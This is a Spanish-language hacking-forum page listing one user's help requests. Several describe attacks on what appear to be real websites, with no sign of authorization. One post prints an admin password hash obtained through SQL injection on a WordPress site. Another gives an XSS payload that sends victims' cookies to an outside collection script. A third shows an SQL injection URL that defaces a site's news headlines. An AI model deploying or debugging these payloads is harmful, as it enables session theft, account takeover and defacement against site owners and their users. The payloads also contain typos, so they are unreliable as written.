elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: (TUTORIAL) Aprende a emular Sentinel Dongle By Yapis


  Mostrar Temas
Páginas: [1]
1  Seguridad Informática / Hacking / Ayuda con Armitage en: 29 Febrero 2012, 16:32 pm
Saludos,

Buen mi problema es que despues que hice msfupdate ahora corro el Armitage despues de que scann los host y todo bien al buscar los ataques solo me sale 2 opciones, Antes del update si tenia todas las opciones de ataque.

Ayuda porfavor gracias por adelantado.
2  Seguridad Informática / WarZone / ayuda con Hack-Web_EAS y Misc_mystery en: 19 Enero 2012, 18:30 pm
Bueno la de la escuela la pase hace mucho tiempo atras pero queria saber si esta funcionando por que recuerdo que si me logeaba como AL1954 y podia entrar y ver las materias. SOLO SABER SI FUNCIONA?


Por otra parte Misc_mystery esta no tengo idea de por donde comensar para encontrar el .php ya e vi todo el LP y no veo nada que hable de ROSS.
3  Seguridad Informática / Nivel Web / Worpress HASH en: 4 Noviembre 2010, 21:21 pm
Saludos a todos mi pregunta es algo sencilla no se si va en esta parte del foro pero aqui va hice un ataque de sql injection a una pagina web de wordpress como resultado tengo esto:

admin:$P$BvlIB.luCxq7KHJI5Xom4nEZhqGDgq/


Alguien me podria decir que tipo de encriptacion esta y si hay algun tools ya que al principio pense que era sha o des pero no es asi.

Gracias
4  Seguridad Informática / Nivel Web / XSS Help!!! en: 10 Febrero 2010, 17:15 pm
Encontre un bug de xss en una pagina web al poner  "><scritp>alert(document.cookie)</script> me da la cookie perfectamente pero al hacer esto

"><scritp>window.location="http://mysite.us/c.php?cookie="+document.cookie;</script>

no me caputara la cookie ya intente mandar solo a la web y lo hace perfectamente el problema esta parece que no me concatena el document.cookie alguna ayuda!!!
5  Seguridad Informática / Nivel Web / Sql injection! Ayuda con esto! en: 5 Diciembre 2008, 17:18 pm
http://victima.com/noticias.php?id=1;update noticias set
titular=concat(char(0x4c),char(0x69),char(0x63),char(0x65),char(0x79),char(0x20),char(0x43),
char(0x61),char(0x6d),char(0x70),char(0x65),char(0x6f),char(0x6e)) where id_noticia= 131/*

este es el query

You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ';update noticias settitular=concat(char(0x4c),char(0x69),char(0

este es el error lo que no entiendo es por que no corre
6  Seguridad Informática / WarZone / Criptografia_Wi en: 4 Abril 2008, 21:42 pm
Criptografia_Wi En esta prueba que diablos hay q hacer la imagen no se ve no veo key nada no se q hay que hacer
y asi hay otras que no dice nada de lo que hay que hacer
help
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines